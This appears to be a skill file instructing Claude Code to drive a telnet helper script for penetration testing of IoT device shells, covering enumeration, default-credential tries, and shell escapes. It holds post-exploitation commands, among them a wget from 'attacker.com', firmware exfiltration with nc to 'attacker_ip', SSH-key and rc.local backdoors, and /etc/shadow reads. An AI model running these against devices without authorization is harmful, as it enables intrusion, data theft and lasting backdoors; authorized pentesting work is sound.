Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation...
This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.
pip install pexpect or sudo pacman -S python-pexpect)sudo pacman -S inetutils on Arch)IMPORTANT: This skill includes a Python helper script (telnet_helper.py) that provides a clean, reliable interface for telnet communication. This is the RECOMMENDED method for interacting with IoT devices.
ALL commands run by Claude will be logged to /tmp/telnet_session.log by default.
To observe what Claude is doing in real-time:
# In a separate terminal, run:
tail -f /tmp/telnet_session.log
This allows you to watch all telnet I/O as it happens without interfering with the connection.
The helper script solves many problems with direct telnet usage:
/tmp/telnet_session.log for observationSingle Command:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"
Custom Port:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"
With Custom Prompt (recommended for known devices):
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt "^/ [#\$]" --command "ifconfig"
Interactive Mode:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
Batch Commands from File:
# Create a file with commands (one per line)
echo -e "uname -a\ncat /proc/version\nifconfig\nps" > commands.txt
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt
JSON Output (for parsing):
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a" --json
Debug Mode:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "ls" --debug
Session Logging (for observation):
# Terminal 1 - Run with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
--host 192.168.1.100 \
--port 2222 \
--logfile /tmp/session.log \
--interactive
# Terminal 2 - Watch the session in real-time
tail -f /tmp/session.log
Note: See OBSERVING_SESSIONS.md for comprehensive guide on monitoring telnet sessions.
See examples.md for full worked walkthroughs: initial device identification, BusyBox detection, full system enumeration, SUID hunting, and hardcoded-credential discovery.
Required (one of):
--command, -c CMD Execute single command
--interactive, -i Enter interactive mode
--script, -s FILE Execute commands from file
Connection Options:
--host, -H HOST Target host IP or hostname (required)
--port, -P PORT Telnet port (default: 23)
--timeout, -t SECONDS Command timeout (default: 3.0)
--prompt, -p PATTERN Custom prompt regex pattern
Output Options:
--raw, -r Don't clean output (show echoes, prompts)
--json, -j Output in JSON format
--logfile, -l FILE Log all I/O to file (default: /tmp/telnet_session.log)
--debug Show debug information
The helper script includes common prompt patterns, but you can specify custom ones:
# BusyBox shell (common on IoT)
--prompt "/\s*[#\$]\s*$"
# Standard root/user prompts
--prompt "^[#\$]\s*$"
# Custom device
--prompt "^MyDevice>\s*$"
# Uniview cameras
--prompt "^User@[^>]+>\s*$"
Here's a complete example of safely enumerating a device:
# Set variables for convenience
HELPER="python3 .claude/skills/telnetshell/telnet_helper.py"
HOST="192.168.1.100"
PORT="2222"
LOGFILE="/tmp/telnet_session.log"
# System information
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "uname -a"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/version"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/cpuinfo"
# Check for BusyBox
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "busybox"
# Network configuration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ifconfig"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "route -n"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "netstat -tulpn"
# Process listing (may need longer timeout)
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --timeout 5 --command "ps aux"
# File system exploration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ls -la /"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "mount"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "df -h"
# Security assessment
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "find / -perm -4000 2>/dev/null"
IMPORTANT FOR CLAUDE CODE: When using this skill, ALWAYS include --logfile /tmp/telnet_session.log in every command so the user can monitor activity with tail -f /tmp/telnet_session.log.
Default connection:
--port)--timeout)/tmp/telnet_session.log by defaultCommon telnet ports on IoT devices:
IMPORTANT: The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.
Identifying BusyBox:
# Check what shell you're using
busybox
busybox --help
# Or check symlinks
ls -la /bin/sh
# Often shows: /bin/sh -> /bin/busybox
# List available BusyBox applets
busybox --list
BusyBox Limitations:
Common BusyBox commands available:
# Core utilities (usually available)
cat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown
ps, kill, top, free, df, mount, umount
grep, find, sed, awk (limited versions)
ifconfig, route, ping, netstat, telnet
vi (basic text editor - no syntax highlighting)
# Check what's available
busybox --list | sort
ls /bin /sbin /usr/bin /usr/sbin
BusyBox-specific considerations for pentesting:
ps output format may differ from standard LinuxUseful BusyBox commands for enumeration:
# Check BusyBox version (may have known vulnerabilities)
busybox | head -1
# Network utilities often available
nc -l -p 4444 # Netcat listener
wget http://attacker.com/shell.sh
ftpget server file
telnet 192.168.1.1
# httpd (web server) often included
busybox httpd -p 8080 -h /tmp # Quick file sharing
Once you have shell access, gather the following information:
System Information:
# Kernel and system info
uname -a
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo
# Distribution/firmware info
cat /etc/issue
cat /etc/*release*
cat /etc/*version*
# Hostname and network
hostname
cat /etc/hostname
ifconfig -a
cat /etc/network/interfaces
cat /etc/resolv.conf
# Mounted filesystems
mount
cat /proc/mounts
df -h
# Running processes
ps aux
ps -ef
top -b -n 1
User and Permission Information:
# Current user context
id
whoami
groups
# User accounts
cat /etc/passwd
cat /etc/shadow # If readable - major security issue!
cat /etc/group
# Sudo/privilege info
sudo -l
cat /etc/sudoers
Network Services:
# Listening services
netstat -tulpn
lsof -i
# Firewall rules
iptables -L -n -v
cat /etc/iptables/*
Interesting Files and Directories:
# Configuration files
ls -la /etc/
find /etc/ -type f -readable
# Web server configs
ls -la /etc/nginx/
ls -la /etc/apache2/
ls -la /var/www/
# Credentials and keys
find / -name "*.pem" 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*credential*" 2>/dev/null
grep -r "password" /etc/ 2>/dev/null
# SUID/SGID binaries (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
# World-writable files/directories
find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type d 2>/dev/null
# Development/debugging tools
which gdb gcc python perl ruby tcpdump
ls /usr/bin/ /bin/ /sbin/ /usr/sbin/
Check for common vulnerabilities:
# Kernel exploits
uname -r # Check kernel version for known exploits
# Check for exploitable services
ps aux | grep root
# Writable service files
find /etc/init.d/ -writable 2>/dev/null
# Cron jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
Establish additional access methods:
# Add SSH access (if SSH is available)
mkdir -p /root/.ssh
echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh
# Start SSH service (if not running)
/etc/init.d/ssh start
# or
/etc/init.d/sshd start
# or
/etc/init.d/dropbear start # Common on embedded devices
# Add to startup scripts
echo "/path/to/backdoor &" >> /etc/rc.local
Extract firmware for offline analysis:
# Find MTD partitions (common on embedded devices)
cat /proc/mtd
cat /proc/partitions
# Dump flash partitions
dd if=/dev/mtd0 of=/tmp/bootloader.bin
dd if=/dev/mtd1 of=/tmp/kernel.bin
dd if=/dev/mtd2 of=/tmp/rootfs.bin
# Copy to external storage or network
# If network is available:
nc attacker_ip 4444 < /tmp/rootfs.bin
# If HTTP server is available:
cd /tmp
busybox httpd -p 8000
# Then download from http://device_ip:8000/rootfs.bin
# Connect - drops directly to root shell
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --interactive
# Enumerate and exploit
# Many IoT cameras use port 2222
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
# If you encounter a password prompt, the helper will detect it
# Try default credentials:
# - root/root
# - admin/admin
# - root/(empty)
# Search online for device-specific defaults
# If you get a limited shell:
# Try common escape techniques:
echo $SHELL
/bin/sh
/bin/bash
vi # Then :!/bin/sh
less /etc/passwd # Then !/bin/sh
find / -exec /bin/sh \;
awk 'BEGIN {system("/bin/sh")}'
/tmp/telnet_session.logtail -f in another terminal to watch activityProblem: Connection refused
Problem: Connection timeout
Problem: "Permission denied"
Problem: Commands not echoing
--raw flag to see unfiltered outputProblem: Garbled output or wrong prompt detection
--prompt flag with custom regex pattern for your specific deviceThe skill includes pre-built enumeration scripts for common tasks:
enum_system.txt: System information gatheringenum_network.txt: Network configuration enumerationenum_files.txt: File system explorationenum_security.txt: Security-focused enumerationUsage:
python3 .claude/skills/telnetshell/telnet_helper.py \
--host 192.168.1.100 \
--port 2222 \
--script .claude/skills/telnetshell/enum_system.txt
# Basic connection to standard telnet port
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"
# Connection to custom port (common for IoT cameras)
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"
# Interactive session with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
--host 192.168.1.100 \
--port 2222 \
--logfile /tmp/camera_session.log \
--interactive
# Batch enumeration
python3 .claude/skills/telnetshell/telnet_helper.py \
--host 192.168.1.100 \
--port 2222 \
--script enum_system.txt \
--json > results.json
# Long-running command with custom timeout
python3 .claude/skills/telnetshell/telnet_helper.py \
--host 192.168.1.100 \
--timeout 10 \
--command "find / -name '*.conf'"
